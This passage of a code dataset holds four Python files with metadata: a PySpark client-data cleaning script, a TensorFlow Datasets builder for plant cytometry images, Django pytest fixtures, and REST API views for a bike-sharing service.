"line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "5426809969", "text": "import argparse\nimport os\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col\nfrom pyspark.sql import DataFrame\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\nfrom typing import TypeVar, Sequence\nimport sys\n\nos.environ['PYSPARK_PYTHON'] = sys.executable\nos.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable\n\nT = TypeVar('T')\nC = TypeVar('C')\nD = TypeVar('D')\n\nlogger = logging.getLogger(\"KommatiPara-Log\")\nlogger.setLevel(logging.DEBUG)\n\nos.makedirs(\"logs\", exist_ok=True)\n\nhandler = RotatingFileHandler(\"logs/kommatipara.log\", maxBytes=200, backupCount=3)\nlogger.addHandler(handler)\n\nsc = SparkSession.builder.master(\"local\").appName(\"KommatiPara\").getOrCreate()\n\ndef load_csv(filepath: str) -> DataFrame:\n \"\"\"\n Load csv from a given filepath.\n\n :param str filepath: path to the .csv file\n :return: pyspark dataframe\n \"\"\"\n if os.path.exists(filepath):\n df = sc.read.option(\"header\", \"true\").csv(filepath)\n logger.debug(f\"Data loaded: {filepath}\")\n #log dataset loaded\n return df\n \n logger.error(f\"Filepath doesn't exist: {filepath}\")\n raise TypeError(f\"Filepath doesn't exist {filepath}\")\n\ndef filter_data(df: D, filters: Sequence[T], colname: C) -> D:\n \"\"\"\n Filters data given list of filters and a column name.\n\n :param dataframe df: dataframe to be filtered\n :param list filters: list of countries to keep\n :param colname str colname: name of the column for the filter criteria\n :return: filtered dataset\n \"\"\"\n logger.debug(f\"Filtering column: {colname} values: {filters}\")\n return df.filter(col(colname).isin(filters))\n\ndef remove_personal_info(df: DataFrame, personal_info: Sequence[str]) -> DataFrame:\n \"\"\"\n Drops personal info from the dataframe\n :param dataframe df: dataframe where to remove personal info\n :param personal_info list: list of columns to drop\n :return modified dataframe\n \"\"\"\n return df.drop(*personal_info)\n\ndef rename_columns(df: D, columns_to_rename: Sequence[T]) -> D:\n \"\"\"\n Renames columns from dataframe.\n\n :param dataframe df: dataframe where to rename\n :param list columns_to_rename: list of tuples (old name, new name)\n :return: dataframe with renamed columns\n \"\"\"\n logger.debug(f\"Data to be renamed: {columns_to_rename}\")\n for (old,new) in columns_to_rename:\n if not isinstance(new, str):\n logger.error(f\"New column is not a string: {type(new)}\")\n raise TypeError(f\"New column name must be a string, not {type(new)}\")\n df = df.withColumnRenamed(old, new)\n\n return df\n\ndef save_csv_output_file(df: DataFrame, path: str) -> None:\n \"\"\"\n Save output inside the path folder as csv and overwite if already 
exists\n :param dataframe df: dataframe to be saved\n :param string path: path to the folder where to save the output\n :return void\n \"\"\"\n\n df.write.option(\"header\",True).mode('overwrite').csv(path)\n logger.debug(f\"Output saved on: {path}\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--d1', type=str, required=True, help='path to the first dataset')\n parser.add_argument('--d2', type=str, required=True, help='path to the second dataset')\n parser.add_argument('--f','--list', nargs='+', help='Filter on Country', required=True)\n\n opt = parser.parse_args()\n\n logger.debug(f\"Arguments parsed: {opt.d1}, {opt.d2}, {opt.f}\")\n\n df_clients = load_csv(opt.d1)\n df_fin = load_csv(opt.d2)\n\n df_clients = filter_data(df=df_clients, filters=opt.f, colname='country')\n\n df_full_clients = df_clients.join(df_fin, on=['id'], how='inner')\n\n df_full_clients = remove_personal_info(df=df_full_clients, personal_info=['first_name', 'last_name', 'cc_n'])\n\n df_full_clients = rename_columns(df=df_full_clients, columns_to_rename=[('id', 'client_identifier'), ('btc_a', 'bitcoin_address'), ('cc_t', 'credit_card_type')])\n\n save_csv_output_file(df=df_full_clients, path='client_data')", "repo_name": "giuseppefrn/Assignment-KommatiPara", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4004, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 15, "usage_type": "attribute"}, {"api_name": "typing.TypeVar", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 18, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 26, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder.master", "line_number": 29, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pyspark.sql.DataFrame", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 47, "usage_type": "name"}, {"api_name": "pyspark.sql.functions.col", "line_number": 57, "usage_type": "call"}, {"api_name": "pyspark.sql.DataFrame", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 68, "usage_type": "name"}, {"api_name": "pyspark.sql.DataFrame", "line_number": 85, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "16415048403", "text": "\"\"\"romania dataset.\"\"\"\n\nimport tensorflow_datasets as tfds\nimport tensorflow as tf\nimport tifffile as 
tiff\nimport os\nimport re\n\n_DESCRIPTION = \"\"\"\"\"\"\n\n# TODO(romania): BibTeX citation\n_CITATION = \"\"\"\n\"\"\"\n\n_DATA_OPTIONS = ['all', 'artificial-mixtures', 'metabarcoding', 'metabarcoding2', 'metabarcoding3']\n\n\nclass RomaniaConfig(tfds.core.BuilderConfig):\n \"\"\"BuilderConfig for romania dataset.\"\"\"\n\n def __init__(self, dataset=None, selection=None, **kwargs):\n \"\"\"Constructs a RomaniaConfig.\n\n Args:\n selection: `str`, one of `_DATA_OPTIONS`.\n **kwargs: keyword arguments forwarded to super.\n \"\"\"\n\n if selection not in _DATA_OPTIONS:\n raise ValueError('Selection must be one of %s' % _DATA_OPTIONS)\n\n super(RomaniaConfig, self).__init__(\n version=tfds.core.Version('3.0.0'),\n release_notes={\n '3.0.0': 'new artificial mixtures and metabarcoding configs',\n '2.0.0': 'New dataset, metabarcoding config',\n '1.0.0': 'Full dataset'\n },\n **kwargs)\n self.selection = selection\n self.dataset = dataset\n\n\nclass Romania(tfds.core.GeneratorBasedBuilder):\n \"\"\"DatasetBuilder for romania dataset.\"\"\"\n\n MANUAL_DOWNLOAD_INSTRUCTIONS = \"\"\"\n Place the dataset tar.gz file in the `~/tensorflow_datasets/downloads/manual` dir.\n \"\"\"\n\n # pytype: disable=wrong-keyword-args\n BUILDER_CONFIGS = [\n RomaniaConfig(name='all', selection='all', dataset=\"romania-train-3.0.0.tar.gz\", description='All training samples'),\n RomaniaConfig(name='artificial-mixtures', selection='artificial-mixtures', dataset=\"romania-train-3.0.0.tar.gz\", description='All training samples'),\n RomaniaConfig(name='metabarcoding', selection='metabarcoding', dataset=\"romania-train-3.0.0.tar.gz\", description='Training samples that were identified with metabarcoding'),\n RomaniaConfig(name='metabarcoding2', selection='metabarcoding2', dataset=\"romania-train-3.0.0.tar.gz\", description='Training samples that were identified with metabarcoding, monosamples and art. 
mixtures'),\n RomaniaConfig(name='metabarcoding3', selection='metabarcoding3', dataset=\"romania-train-3.0.0.tar.gz\", description='Training samples that were identified with metabarcoding, additional Hypericum samples')\n ]\n\n # pytype: enable=wrong-keyword-args\n def _info(self) -> tfds.core.DatasetInfo:\n \"\"\"Returns the dataset metadata.\"\"\"\n\n channels = {str(i + 1): tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib') for i in\n range(6)}\n channels['9'] = tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib')\n masks = {str(i + 1): tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib') for i in\n range(6)}\n masks['9'] = tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib')\n\n features = {'channels': {**channels},\n 'masks': {**masks},\n 'filename': tf.string,\n 'species': tfds.features.ClassLabel(names_file=f'romania/{self.builder_config.selection}-classes-species.txt')}\n\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=tfds.features.FeaturesDict(features),\n supervised_keys=None,\n homepage='https://github.com/lahr/icyt-tfds',\n citation=_CITATION,\n )\n\n def _split_generators(self, dl_manager: tfds.download.DownloadManager):\n \"\"\"Returns SplitGenerators.\"\"\"\n\n path = os.path.join(dl_manager.manual_dir, self.builder_config.dataset)\n\n if not tf.io.gfile.exists(path):\n raise AssertionError(\n f'You must download the dataset .tar.gz file and place it into {dl_manager.manual_dir}')\n\n path_iter = dl_manager.iter_archive(path)\n return {\n 'train': self._generate_examples(path_iter)\n }\n\n def _generate_examples(self, path_iter, split_name=None):\n \"\"\"Yields examples.\"\"\"\n\n path_regex = r'^(?:([^/\\n.A-Z]+)/)?([a-zA-Z]+\\.?[a-zA-Z]+)/(.*)/.*$'\n\n if self.builder_config.selection != 'all':\n with open(f'romania/{self.builder_config.selection}-measurements.txt') as f:\n measurements = tuple([line.rstrip() for line in f])\n\n for filename, fobj in path_iter:\n assert filename is not None\n assert fobj is not None\n\n m = re.match(path_regex, filename)\n\n if self.builder_config.selection != 'all':\n if not m.group(3).startswith(measurements):\n continue\n\n species = m.group(2)\n\n img = tiff.imread(fobj)\n num_channels = img.shape[-1] / 2\n\n if num_channels == 7 or num_channels == 9:\n channels = {str(i + 1): img[:, :, i] for i in range(0, 6)}\n channels['9'] = img[:, :, 6]\n masks = {str(i - 6): img[:, :, i] for i in range(7, 13)}\n masks['9'] = img[:, :, 13]\n\n elif num_channels == 12:\n channels = {str(i + 1): img[:, :, i] for i in range(0, 6)}\n channels['9'] = img[:, :, 8]\n masks = {str(i - 11): img[:, :, i] for i in range(12, 18)}\n masks['9'] = img[:, :, 20]\n\n else:\n raise AssertionError(f'Unknown number of channels ({num_channels}) for file {filename}')\n\n features = {\n 'channels': {**channels},\n 'masks': {**masks},\n 'filename': filename,\n 'species': species}\n\n yield filename, features\n", "repo_name": "lahr/icyt-tfds", "sub_path": "romania/romania.py", "file_name": "romania.py", "file_ext": "py", "file_size_in_byte": 5760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow_datasets.core", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core.Version", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow_datasets.core", "line_number": 33, "usage_type": "attribute"}, {"api_name": 
"tensorflow_datasets.core", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.string", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.ClassLabel", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core.DatasetInfo", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow_datasets.core", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.FeaturesDict", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.download", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.io.gfile.exists", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 90, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 112, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "14075355", "text": "import pytest\nfrom pytest_factoryboy import register\nfrom graphql_jwt.shortcuts import get_token\n\nfrom factories.plans import PlanFactory\nfrom factories.companies import CompanyFactory\nfrom factories.dealings import DealingFactory\nfrom factories.distribute_logs import DistributeLogFactory\nfrom factories.items import ItemFactory\nfrom factories.exchange_applied_items import ExchangeAppliedItemFactory\nfrom factories.exchanged_item_logs import ExchangedItemLogFactory\nfrom factories.purchased_point_logs import PurchasedPointLogFactory\n\nregister(PlanFactory)\nregister(CompanyFactory)\nregister(DealingFactory)\nregister(DistributeLogFactory)\nregister(ItemFactory)\nregister(ExchangeAppliedItemFactory)\nregister(ExchangedItemLogFactory)\nregister(PurchasedPointLogFactory)\n\nfrom pdb import set_trace as st\n\n\n@pytest.fixture(autouse=True)\ndef test_generate_plan_fixtures(plan_factory):\n plan_factory.create(name=\"free\", fee=0)\n plan_factory.create(name=\"standard\", fee=2000)\n plan_factory.create(name=\"professional\", fee=5000)\n assert True\n\n\n@pytest.fixture\ndef 
company_fixture(company_factory):\n return company_factory.create(point=1000)\n\n\n@pytest.fixture\ndef create_user_fixture(django_user_model):\n \"\"\"\n userが作成される時に、同時にaccountとprofileも作成される\n \"\"\"\n\n def make_user(**kwargs):\n return django_user_model.objects.create_user(**kwargs)\n\n return make_user\n\n\n# from graphql_jwt.testcases import JSONWebTokenTestCase, JSONWebTokenClient\n# @pytest.fixture\n# def logged_in_client_fixture(company_fixture, create_user_fixture):\n# user = create_user_fixture(\n# email=\"user@test.jp\",\n# password=\"test_password\",\n# company=company_fixture,\n# is_active=True,\n# is_admin=True,\n# )\n\n# client = JSONWebTokenTestCase().client_class()\n# client.authenticate(user)\n# return client, user\n\n\n@pytest.fixture\ndef logged_in_client_fixture(company_fixture, create_user_fixture):\n \"\"\"ログイン済みユーザーのfixture\"\"\"\n user = create_user_fixture(\n email=\"user@test.jp\",\n password=\"test_password\",\n company=company_fixture,\n is_active=True,\n is_admin=True,\n )\n\n headers = {\"HTTP_AUTHORIZATION\": f\"JWT {get_token(user)}\"}\n\n return user, headers\n", "repo_name": "mizutaninaoki/poppie", "sub_path": "test/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 2305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest_factoryboy.register", "line_number": 14, "usage_type": "call"}, {"api_name": "factories.plans.PlanFactory", "line_number": 14, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 15, "usage_type": "call"}, {"api_name": "factories.companies.CompanyFactory", "line_number": 15, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 16, "usage_type": "call"}, {"api_name": "factories.dealings.DealingFactory", "line_number": 16, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 17, "usage_type": "call"}, {"api_name": "factories.distribute_logs.DistributeLogFactory", "line_number": 17, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 18, "usage_type": "call"}, {"api_name": "factories.items.ItemFactory", "line_number": 18, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 19, "usage_type": "call"}, {"api_name": "factories.exchange_applied_items.ExchangeAppliedItemFactory", "line_number": 19, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 20, "usage_type": "call"}, {"api_name": "factories.exchanged_item_logs.ExchangedItemLogFactory", "line_number": 20, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 21, "usage_type": "call"}, {"api_name": "factories.purchased_point_logs.PurchasedPointLogFactory", "line_number": 21, "usage_type": "argument"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 39, "usage_type": "attribute"}, {"api_name": "graphql_jwt.shortcuts.get_token", "line_number": 78, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 67, "usage_type": "attribute"}]} +{"seq_id": "27199747982", "text": "from allauth.socialaccount.models import SocialApp\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.gis.geos import Point\nfrom django.contrib.gis.measure import D\nfrom django.contrib.sites.shortcuts import 
get_current_site\nfrom django.contrib.syndication.views import Feed\nfrom django.core.paginator import Paginator\nfrom django.urls import reverse\nfrom django.utils.feedgenerator import Rss201rev2Feed\nfrom django.utils.timezone import now, timedelta\nfrom preferences import preferences\nfrom rest_framework import exceptions, generics, mixins, status, viewsets\nfrom rest_framework.authentication import SessionAuthentication, TokenAuthentication\nfrom rest_framework.decorators import (\n action,\n api_view,\n authentication_classes,\n permission_classes,\n)\nfrom rest_framework.permissions import (\n SAFE_METHODS,\n AllowAny,\n BasePermission,\n IsAuthenticated,\n)\nfrom rest_framework.response import Response\nfrom rest_framework.views import exception_handler\nfrom rest_framework_api_key.permissions import HasAPIKey\n\nfrom bikesharing.models import Bike, Location, LocationTracker, Rent, Station\nfrom cykel.models import CykelLogEntry\n\nfrom .authentication import BasicTokenAuthentication\nfrom .serializers import (\n BikeSerializer,\n CreateRentSerializer,\n LocationTrackerUpdateSerializer,\n MaintenanceBikeSerializer,\n RentSerializer,\n SocialAppSerializer,\n StationSerializer,\n UserDetailsSerializer,\n)\n\n\nclass BikeViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = Bike.objects.all()\n serializer_class = BikeSerializer\n\n\nclass StationViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = Station.objects.all()\n serializer_class = StationSerializer\n\n\nclass CanRentBikePermission(BasePermission):\n \"\"\"The request is authenticated as a user and has add_rent permission.\"\"\"\n\n message = \"You cannot rent a bike at this time.\"\n\n def has_permission(self, request, view):\n if not request.user or not request.user.is_authenticated:\n return False\n\n if request.method in SAFE_METHODS:\n return True\n\n return request.user.has_perm(\"bikesharing.add_rent\")\n\n\nclass CanUseMaintenancePermission(BasePermission):\n \"\"\"The request is authenticated as a user and has maintenance\n permission.\"\"\"\n\n def has_permission(self, request, view):\n if not request.user or not request.user.is_authenticated:\n return False\n\n return request.user.has_perm(\"bikesharing.maintain\")\n\n\n@permission_classes([IsAuthenticated, CanRentBikePermission])\nclass RentViewSet(\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet,\n):\n def get_serializer_class(self):\n if self.action == \"create\":\n return CreateRentSerializer\n else:\n return RentSerializer\n\n def get_queryset(self):\n user = self.request.user\n return Rent.objects.filter(user=user, rent_end=None)\n\n def create(self, request):\n resp = super().create(request)\n if resp.status_code != status.HTTP_201_CREATED:\n return resp\n\n rent = self.get_queryset().get(id=resp.data[\"id\"])\n\n if rent.bike.state == Bike.State.MISSING:\n data = {}\n if rent.start_location:\n data = {\"location_id\": rent.start_location.id}\n\n CykelLogEntry.objects.create(\n content_object=rent.bike,\n action_type=\"cykel.bike.missing_reporting\",\n data=data,\n )\n\n # override output with RentSerializer\n serializer = RentSerializer(rent, context={\"request\": request})\n headers = self.get_success_headers(serializer.data)\n return Response(\n serializer.data, status=status.HTTP_201_CREATED, headers=headers\n )\n\n @action(detail=True, methods=[\"post\"])\n def finish(self, request, pk=None):\n rent = self.get_object()\n\n lat = request.data.get(\"lat\")\n lng = request.data.get(\"lng\")\n\n if 
rent.user != request.user:\n return Response(\n {\"error\": \"rent belongs to another user\"},\n status=status.HTTP_403_PERMISSON_DENIED,\n )\n if rent.rent_end is not None:\n return Response(\n {\"error\": \"rent was already finished\"}, status=status.HTTP_410_GONE\n )\n\n end_location = None\n if lat and lng:\n end_location = Location.objects.create(\n bike=rent.bike,\n source=Location.Source.USER,\n reported_at=now(),\n geo=Point(float(lng), float(lat), srid=4326),\n )\n\n rent.end(end_location)\n\n return Response({\"success\": True})\n\n @action(detail=True, methods=[\"post\"])\n def unlock(self, request, pk=None):\n rent = self.get_object()\n\n if rent.user != request.user:\n return Response(\n {\"error\": \"rent belongs to another user\"},\n status=status.HTTP_403_PERMISSON_DENIED,\n )\n\n if rent.rent_end is not None:\n return Response(\n {\"error\": \"rent was already finished\"}, status=status.HTTP_410_GONE\n )\n\n try:\n data = rent.unlock()\n except Exception as e:\n print(e)\n return Response({\"success\": False})\n\n return Response({\"success\": True, \"data\": data})\n\n\n@api_view([\"POST\"])\n@permission_classes([HasAPIKey])\ndef updatebikelocation(request):\n device_id = request.data.get(\"device_id\")\n if not (device_id):\n return Response({\"error\": \"device_id missing\"}, status=400)\n try:\n tracker = LocationTracker.objects.get(device_id=device_id)\n except LocationTracker.DoesNotExist:\n return Response({\"error\": \"tracker does not exist\"}, status=404)\n\n serializer = LocationTrackerUpdateSerializer(tracker, data=request.data)\n if not serializer.is_valid():\n return Response(serializer.errors, status=400)\n\n serializer.save()\n\n lat = request.data.get(\"lat\")\n lng = request.data.get(\"lng\")\n accuracy = request.data.get(\"accuracy\")\n loc = None\n\n if lat and lng:\n loc = Location(\n source=Location.Source.TRACKER,\n reported_at=now(),\n tracker=tracker,\n geo=Point(float(lng), float(lat), srid=4326),\n )\n if tracker.bike:\n loc.bike = tracker.bike\n if accuracy:\n loc.accuracy = accuracy\n loc.save()\n\n if tracker.bike:\n bike = tracker.bike\n bike.last_reported = now()\n\n if loc and not loc.internal:\n # check if bike is near station and assign it to that station\n # distance ist configured in prefernces\n max_distance = preferences.BikeSharePreferences.station_match_max_distance\n station_closer_than_Xm = Station.objects.filter(\n location__distance_lte=(loc.geo, D(m=max_distance)),\n status=Station.Status.ACTIVE,\n ).first()\n if station_closer_than_Xm:\n bike.current_station = station_closer_than_Xm\n else:\n bike.current_station = None\n\n bike.save()\n\n someminutesago = now() - timedelta(minutes=15)\n data = {}\n if loc:\n data = {\"location_id\": loc.id}\n\n if tracker.tracker_status == LocationTracker.Status.MISSING:\n action_type = \"cykel.tracker.missing_reporting\"\n CykelLogEntry.create_unless_time(\n someminutesago, content_object=tracker, action_type=action_type, data=data\n )\n\n if tracker.bike and tracker.bike.state == Bike.State.MISSING:\n action_type = \"cykel.bike.missing_reporting\"\n CykelLogEntry.create_unless_time(\n someminutesago,\n content_object=tracker.bike,\n action_type=action_type,\n data=data,\n )\n\n if not loc:\n return Response({\"success\": True, \"warning\": \"lat/lng missing\"})\n\n return Response({\"success\": True})\n\n\n@authentication_classes(\n [SessionAuthentication, TokenAuthentication, BasicTokenAuthentication]\n)\n@permission_classes([IsAuthenticated, CanUseMaintenancePermission])\nclass 
MaintenanceViewSet(viewsets.ViewSet):\n @action(detail=False, methods=[\"GET\"])\n def mapdata(self, request):\n bikes = Bike.objects.filter(location__isnull=False).distinct()\n serializer = MaintenanceBikeSerializer(bikes, many=True)\n return Response(serializer.data)\n\n @action(detail=False, methods=[\"GET\"])\n def logentryfeed(self, request):\n feed = LogEntryFeed()\n return feed(request)\n\n\nclass UserDetailsView(generics.RetrieveAPIView):\n \"\"\"Reads UserModel fields Accepts GET method.\n\n Default accepted fields: username Default display fields: pk,\n username Read-only fields: pk Returns UserModel fields.\n \"\"\"\n\n serializer_class = UserDetailsSerializer\n permission_classes = (IsAuthenticated,)\n\n def get_object(self):\n return self.request.user\n\n def get_queryset(self):\n \"\"\"Adding this method since it is sometimes called when using django-\n rest-swagger https://github.com/Tivix/django-rest-auth/issues/275.\"\"\"\n return get_user_model().objects.none()\n\n\n@permission_classes([AllowAny])\nclass LoginProviderViewSet(\n mixins.ListModelMixin,\n viewsets.GenericViewSet,\n):\n \"\"\"return the configured social login providers.\"\"\"\n\n serializer_class = SocialAppSerializer\n\n def get_queryset(self):\n return SocialApp.objects.filter(sites__id=get_current_site(self.request).id)\n\n\nclass RSS20PaginatedFeed(Rss201rev2Feed):\n def add_root_elements(self, handler):\n super(Rss201rev2Feed, self).add_root_elements(handler)\n\n if self.feed[\"page\"] > 1:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"first\",\n \"href\": self.feed[\"feed_url\"],\n },\n )\n\n if self.feed[\"page\"] < self.feed[\"last_page\"]:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"last\",\n \"href\": (f\"{self.feed['feed_url']}?page={self.feed['last_page']}\"),\n },\n )\n\n if self.feed[\"page\"] > 1:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"previous\",\n \"href\": (f\"{self.feed['feed_url']}?page={self.feed['page'] - 1}\"),\n },\n )\n\n if self.feed[\"page\"] < self.feed[\"last_page\"]:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"next\",\n \"href\": (f\"{self.feed['feed_url']}?page={self.feed['page'] + 1}\"),\n },\n )\n\n\nclass LogEntryFeed(Feed):\n feed_type = RSS20PaginatedFeed\n\n def title(self):\n return f\"Maintenance Events of {preferences.BikeSharePreferences.system_name}\"\n\n def description(self):\n return self.title()\n\n def link(self):\n return reverse(\n \"admin:%s_%s_changelist\"\n % (CykelLogEntry._meta.app_label, CykelLogEntry._meta.model_name)\n )\n\n def get_entries(self, request):\n return CykelLogEntry.objects.order_by(\"-timestamp\").all()\n\n def get_object(self, request):\n page = int(request.GET.get(\"page\", 1))\n entries = self.get_entries(request)\n paginator = Paginator(entries, 25)\n return {\"page\": page, \"paginator\": paginator}\n\n def items(self, obj):\n return obj[\"paginator\"].get_page(obj[\"page\"])\n\n def feed_extra_kwargs(self, obj):\n context = super().feed_extra_kwargs(obj)\n context[\"page\"] = obj[\"page\"]\n context[\"last_page\"] = obj[\"paginator\"].num_pages\n return context\n\n def item_title(self, item):\n return item.display()\n\n def item_pubdate(self, item):\n return item.timestamp\n\n def item_updateddate(self, item):\n return item.timestamp\n\n def item_description(self, item):\n return self.item_title(item)\n\n def item_link(self, item):\n return reverse(\n \"admin:%s_%s_change\" % (item._meta.app_label, item._meta.model_name),\n args=[item.id],\n 
)\n\n\nclass FilteredLogEntryFeed(LogEntryFeed):\n def get_entries(self, request):\n return CykelLogEntry.objects.order_by(\"-timestamp\").all()\n\n\ndef custom_exception_handler(exc, context):\n response = exception_handler(exc, context)\n if response is None:\n return None\n\n headers = {}\n if isinstance(exc, exceptions.APIException):\n if getattr(exc, \"auth_header\", None):\n headers[\"WWW-Authenticate\"] = exc.auth_header\n\n errors = []\n if getattr(exc, \"detail\", None):\n if isinstance(exc.detail, list):\n errors.append({\"detail\": exc.detail})\n elif isinstance(exc.detail, dict):\n for key, value in exc.detail.items():\n if isinstance(value, list):\n for item in value:\n errors.append({\"detail\": item, \"source\": key})\n else:\n errors.append({\"detail\": value, \"source\": key})\n else:\n errors.append({\"detail\": exc.detail})\n else:\n errors.append({\"detail\": str(exc)})\n\n messages = []\n for item in errors:\n if getattr(item[\"detail\"], \"code\", None):\n item[\"code\"] = item[\"detail\"].code\n messages.append(item[\"detail\"])\n\n data = {\"errors\": errors, \"message\": \"\\n\".join(messages)}\n return Response(data, status=response.status_code, headers=headers)\n", "repo_name": "transportkollektiv/cykel", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 13786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 80, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 46, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 46, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.objects.all", "line_number": 47, "usage_type": "call"}, {"api_name": "bikesharing.models.Bike.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 47, "usage_type": "name"}, {"api_name": "serializers.BikeSerializer", "line_number": 48, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 51, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", 